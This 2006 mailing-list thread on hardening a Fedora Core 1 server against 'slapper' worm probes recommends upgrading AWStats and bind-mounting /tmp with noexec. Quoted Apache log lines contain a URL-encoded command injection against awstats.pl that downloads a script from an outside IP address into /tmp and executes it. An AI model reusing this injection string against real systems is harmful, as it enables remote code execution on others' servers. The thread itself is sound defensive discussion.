slapper worm

William Stockall wstockal at compusmart.ab.ca
Tue Jan 24 00:16:07 UTC 2006


I don't remember for sure if this will work, but it may be possible to 
do something like this:

mount --bind /tmp /tmp -o noexec

I think that will now enforce the noexec on /tmp without having to 
create a new partition for tmp.


			Will.

Michael Mansour wrote:
> Hi Kelson,
> 
> 
>>Michael Mansour wrote:
>>
>>>220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>>>220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>>
>>...
>>
>>>Are there any updates FL can do to any of the packages to fix/block
>>>slapper from an FC1 machine?
>>
>>You might also want to make sure you're using a current version of
>>AWStats.  IIRC this flaw was fixed in either 6.3 or 6.4, and the current
>>version is 6.5.
> 
> 
> Yeah, I run awstats 6.5 on that system.
> 
> 
>>(If you don't have awstats.pl on your system, then these lines are 
>>just probes and aren't relevant to your problem.)
>>
>>More generally, I read advice somewhere that mounting /tmp with the 
>>"noexec" option (and making any other temp directories symbolic 
>>links to that one) can make this type of attack much more difficult.
> 
> 
> Definitely noted as one of the measures to stop this type of attack, but for
> this particular server, /tmp is not a mounted filesystem but part of /, so I
> can't really do that without re-partitioning the disk and creating a dedicated
> /tmp.
> 
> Thanks.
> 
> Michael.
> 